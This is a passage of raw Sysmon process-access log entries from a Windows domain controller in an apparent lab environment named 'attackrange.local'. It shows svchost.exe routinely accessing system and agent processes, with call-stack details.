Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+2210c|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441188Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.239{42DC5269-CE98-6086-0C00-00000000BA01}8403212C:\Windows\system32\svchost.exe{42DC5269-CF43-6086-D800-00000000BA01}4100C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+2210c|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441187Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.239{42DC5269-CE98-6086-0C00-00000000BA01}8403212C:\Windows\system32\svchost.exe{42DC5269-CF3C-6086-AE00-00000000BA01}2188C:\Windows\system32\conhost.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+2210c|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441186Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.239{42DC5269-CE98-6086-0C00-00000000BA01}8403212C:\Windows\system32\svchost.exe{42DC5269-CF3C-6086-AA00-00000000BA01}4168C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+2210c|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441185Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.239{42DC5269-CE98-6086-0C00-00000000BA01}8403212C:\Windows\system32\svchost.exe{42DC5269-CF24-6086-8C00-00000000BA01}4412C:\Windows\System32\msdtc.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+2210c|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441184Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.239{42DC5269-CE98-6086-0C00-00000000BA01}8404316C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2A00-00000000BA01}2900C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441183Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.239{42DC5269-CE98-6086-0C00-00000000BA01}8403212C:\Windows\system32\svchost.exe{42DC5269-CEAB-6086-4100-00000000BA01}3488C:\Windows\system32\conhost.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+2210c|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441182Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.239{42DC5269-CE98-6086-0C00-00000000BA01}8403212C:\Windows\system32\svchost.exe{42DC5269-CEAA-6086-3900-00000000BA01}3304C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+2210c|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441181Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.239{42DC5269-CE98-6086-0C00-00000000BA01}8403212C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2F00-00000000BA01}2136C:\Windows\System32\vds.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+2210c|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441180Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.239{42DC5269-CE98-6086-0C00-00000000BA01}8403212C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2D00-00000000BA01}2448C:\Windows\system32\wbem\unsecapp.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+2210c|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441179Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.239{42DC5269-CE98-6086-0C00-00000000BA01}8403212C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2C00-00000000BA01}2936C:\Windows\system32\dfssvc.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+2210c|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441178Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.238{42DC5269-CE98-6086-0C00-00000000BA01}8403212C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+2210c|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441177Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.238{42DC5269-CE98-6086-0C00-00000000BA01}8404316C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2A00-00000000BA01}2900C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441176Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.238{42DC5269-CE98-6086-0C00-00000000BA01}8403212C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2A00-00000000BA01}2900C:\Windows\system32\svchost.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+2210c|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441175Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.238{42DC5269-CE98-6086-0C00-00000000BA01}8403212C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2900-00000000BA01}2824C:\Windows\system32\dns.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+2210c|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441174Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.238{42DC5269-CE98-6086-0C00-00000000BA01}8403212C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2700-00000000BA01}2744C:\Windows\system32\DFSRs.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+2210c|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441173Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.238{42DC5269-CE98-6086-0C00-00000000BA01}8403212C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2600-00000000BA01}2736C:\Windows\System32\ismserv.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+2210c|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441172Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.238{42DC5269-CE98-6086-0C00-00000000BA01}8403212C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2400-00000000BA01}2712C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+2210c|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441171Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.238{42DC5269-CE98-6086-0C00-00000000BA01}8403212C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2300-00000000BA01}2704C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+2210c|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441170Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.238{42DC5269-CE98-6086-0C00-00000000BA01}8403212C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2200-00000000BA01}2628C:\Windows\System32\spoolsv.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+2210c|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441169Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.238{42DC5269-CE98-6086-0C00-00000000BA01}8403212C:\Windows\system32\svchost.exe{42DC5269-CEA2-6086-2000-00000000BA01}2472C:\Windows\System32\svchost.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+2210c|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441168Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.238{42DC5269-CE98-6086-0C00-00000000BA01}8403212C:\Windows\system32\svchost.exe{42DC5269-CE9A-6086-1F00-00000000BA01}1952C:\Windows\system32\svchost.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+2210c|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441167Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.237{42DC5269-CE98-6086-0C00-00000000BA01}8403212C:\Windows\system32\svchost.exe{42DC5269-CE99-6086-1700-00000000BA01}1340C:\Windows\system32\svchost.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+2210c|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441166Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.237{42DC5269-CE98-6086-0C00-00000000BA01}8403212C:\Windows\system32\svchost.exe{42DC5269-CE99-6086-1600-00000000BA01}1240C:\Windows\system32\svchost.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+2210c|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441165Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.237{42DC5269-CE98-6086-0C00-00000000BA01}8403212C:\Windows\system32\svchost.exe{42DC5269-CE99-6086-1500-00000000BA01}1200C:\Windows\system32\svchost.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+2210c|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441164Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.237{42DC5269-CE98-6086-0C00-00000000BA01}8403212C:\Windows\system32\svchost.exe{42DC5269-CE99-6086-1400-00000000BA01}1052C:\Windows\system32\svchost.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+2210c|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441163Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.237{42DC5269-CE98-6086-0C00-00000000BA01}8403212C:\Windows\system32\svchost.exe{42DC5269-CE99-6086-1300-00000000BA01}1028C:\Windows\system32\dwm.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+2210c|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441162Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.237{42DC5269-CE98-6086-0C00-00000000BA01}8403212C:\Windows\system32\svchost.exe{42DC5269-CE99-6086-1200-00000000BA01}480C:\Windows\System32\svchost.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+2210c|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441161Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.237{42DC5269-CE98-6086-0C00-00000000BA01}8403212C:\Windows\system32\svchost.exe{42DC5269-CE99-6086-1100-00000000BA01}340C:\Windows\system32\svchost.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+2210c|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441160Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.237{42DC5269-CE98-6086-0C00-00000000BA01}8403212C:\Windows\system32\svchost.exe{42DC5269-CE99-6086-1000-00000000BA01}364C:\Windows\System32\svchost.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+2210c|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441159Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.237{42DC5269-CE98-6086-0C00-00000000BA01}8403212C:\Windows\system32\svchost.exe{42DC5269-CE99-6086-0F00-00000000BA01}104C:\Windows\system32\LogonUI.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+2210c|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441158Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.237{42DC5269-CE98-6086-0C00-00000000BA01}8403212C:\Windows\system32\svchost.exe{42DC5269-CE99-6086-0E00-00000000BA01}1016C:\Windows\System32\svchost.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+2210c|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441157Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.237{42DC5269-CE98-6086-0C00-00000000BA01}8403212C:\Windows\system32\svchost.exe{42DC5269-CE99-6086-0D00-00000000BA01}900C:\Windows\system32\svchost.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+2210c|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441156Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.237{42DC5269-CE98-6086-0C00-00000000BA01}8403212C:\Windows\system32\svchost.exe{42DC5269-CE96-6086-0B00-00000000BA01}628C:\Windows\system32\lsass.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+2210c|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441155Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.237{42DC5269-CE98-6086-0C00-00000000BA01}8403212C:\Windows\system32\svchost.exe{42DC5269-CE96-6086-0900-00000000BA01}568C:\Windows\system32\winlogon.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+2210c|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441154Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.237{42DC5269-CE98-6086-0C00-00000000BA01}8403212C:\Windows\system32\svchost.exe{42DC5269-028B-6088-C628-00000000BA01}1280C:\Windows\system32\TSTheme.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+220f4|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441153Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 